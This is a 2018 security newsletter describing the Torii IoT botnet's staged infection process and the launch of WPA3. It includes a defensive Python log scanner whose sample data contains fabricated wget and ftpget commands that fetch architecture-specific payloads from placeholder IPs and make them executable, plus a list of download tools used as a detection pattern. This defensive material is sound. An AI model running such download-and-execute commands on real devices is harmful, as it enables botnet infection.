
INSIGHT WEEKLY SECURITY NEWS LETTER-03-OCT-2018

A New Sophisticated IoT Botnet Attack – Torii

A sophisticated botnet named Torii has been discovered. It spreads using more advanced techniques than the famous Mirai botnet, and its functionality differs from Mirai's.

Malware authors developed the Torii botnet with more stealth and persistence capabilities. Unlike other botnets, it does not perform attacks such as DDoS or other attacks that take down the connected devices.

Impact:

Torii compromises the victim's network, steals sensitive information, and executes commands to perform various malicious activities through strongly layered communication.

Targeted Platform:

The Torii botnet supports a wide range of target architectures, including MIPS, ARM, x86, x64, PowerPC, SuperH, etc.

Botnet Infection Process:

The attack starts with a telnet attack on weak credentials, followed by execution of a shell script that is more sophisticated than those used by typical botnets.

The script tries to determine the architecture of the target device and attempts to download the payload for that device. Interestingly, Torii supports various device architectures, including x86_64, x86, ARM, MIPS, Motorola 68k, SuperH and PPC.

It mainly attempts to compromise a wide range of IoT devices based on common architectures, and it uses several commands to download many binary payloads.

The Torii botnet uses a bash script to direct the infected victim's device to the server hosting the malware.

Once the malware determines the architecture of the target device, it downloads and executes the appropriate binary from the server. This payload's only job is to download the second-stage payload.

  • The first and second stages of the payload use XOR-based encryption.
  • The second stage of the payload mainly contains the bot features that communicate with its command & control server to execute commands.
  • It has features such as anti-debugging techniques, data exfiltration, multi-level encryption of communication and many other evasion techniques.

It's important to remember that once the target device receives the payload, it stops connecting to the download server and connects to the CnC server to receive and act on its commands.
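A defender-side check for the staged download behaviour described above, added here as an example (not code from the newsletter or its sources): it scans a shell-session log for one session requesting payloads for several architectures from a single server. The log format, file names, download utilities and IP addresses are constructed assumptions.

```python
import re
from collections import defaultdict

# Assumed file-name tokens for the architectures the newsletter lists.
ARCH_RE = re.compile(
    r"(?<![a-z0-9_])(x86_64|powerpc|superh|mips|m68k|x86|x64|arm|ppc|sh4)(?![a-z0-9_])")
# Simplification: only IPv4 download servers are recognised.
HOST_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# Assumed download utilities; the page only says "several commands".
DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}

# Constructed sample: "session<TAB>command", documentation-range IPs.
SAMPLE_LOG = "\n".join([
    "s1\tcd /tmp; wget http://198.51.100.7/p.x86_64 || ftpget 198.51.100.7 p.x86_64 p.x86_64",
    "s1\twget http://198.51.100.7/p.arm || ftpget 198.51.100.7 p.arm p.arm",
    "s1\tbusybox wget http://198.51.100.7/p.mips; chmod +x p.mips",
    "s2\twget http://192.0.2.10/firmware-arm.bin",
    "s3\tcurl -O http://203.0.113.5/update.tar.gz",
])

def flag_sessions(log_text, min_archs=3):
    """Return [(session, host, archs, tools)] for sessions that request
    payloads for at least min_archs architectures from one host."""
    seen = defaultdict(lambda: {"archs": set(), "tools": set()})
    for line in log_text.splitlines():
        session, _, cmd = line.partition("\t")
        # One log line may chain several commands with ;, && or ||.
        for part in re.split(r"\|\||&&|;", cmd):
            names = [w.rsplit("/", 1)[-1] for w in part.split()]
            tool = next((n for n in names if n in DOWNLOADERS), None)
            host = HOST_RE.search(part)
            archs = ARCH_RE.findall(part.lower())
            if tool and host and archs:
                entry = seen[(session, host.group())]
                entry["archs"].update(archs)
                entry["tools"].add(tool)
    return [(s, h, sorted(e["archs"]), sorted(e["tools"]))
            for (s, h), e in sorted(seen.items())
            if len(e["archs"]) >= min_archs]

if __name__ == "__main__":
    for hit in flag_sessions(SAMPLE_LOG):
        print(hit)
```

A single-architecture download such as session s2 stays below the default threshold, so ordinary firmware fetches are not flagged.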

Reference: https://gbhackers.com/torii-botnet/


New Wireless Security Feature – WPA3 Has Launched

WPA3 is the next-generation Wi-Fi security standard that promises to eliminate all the known security vulnerabilities and wireless attacks in use today, including the dangerous KRACK attacks.

WPA, or Wi-Fi Protected Access, is a standard designed to authenticate wireless devices using the Advanced Encryption Standard (AES) protocol and is intended to prevent hackers from eavesdropping on your wireless data.

Current Flaws & Impact in WPA2 Protocol

A severe flaw in the current WPA2 protocol, KRACK (Key Reinstallation Attack), makes it possible for attackers to intercept, decrypt and even manipulate WiFi network traffic.

Although most device manufacturers patched their devices against KRACK attacks, the WiFi Alliance, without much delay, rushed to finalize and launch WPA3 in order to address WPA2's technical shortcomings from the ground up.

What New Security Features Does WPA3 Offer?

The WPA3 security standard will replace the existing WPA2, which has been around for at least 15 years and is widely used by billions of devices every day.

  • The new security protocol provides some big improvements for Wi-Fi enabled devices in terms of configuration, authentication, and encryption enhancements.
  • It makes it harder for hackers to hack your Wi-Fi or eavesdrop on your network.
  • The Wi-Fi Alliance launched two flavors of latest security protocol—WPA3-Personal and WPA3-Enterprise—for personal, enterprise, and IoT wireless networks.

Key Features

  • Protection Against Brute-Force Attacks – enhanced protection against offline brute-force dictionary attacks used to crack the Wi-Fi password.
  • Forward Secrecy – WPA3 leverages the SAE (Simultaneous Authentication of Equals) handshake to offer forward secrecy, which prevents attackers from decrypting old captured traffic even if they learn the password.
  • Protecting Public / Open Wi-Fi Networks – WPA3 strengthens user privacy in open networks through individualized data encryption between the device and the access point to mitigate man-in-the-middle attacks.
  • Strong Encryption for Critical Networks – By using WPA3-Enterprise, critical Wi-Fi networks handling sensitive information (such as government and industrial organizations) can protect Wi-Fi connections with 192-bit encryption.

WPA3 is set to roll out later this year and is expected to hit mass adoption in late 2019, when it eventually becomes a requirement for devices to be considered Wi-Fi certified, according to the WiFi Alliance.


Reference: https://thehackernews.com/2018/06/wpa3-wifi-security-standard.html
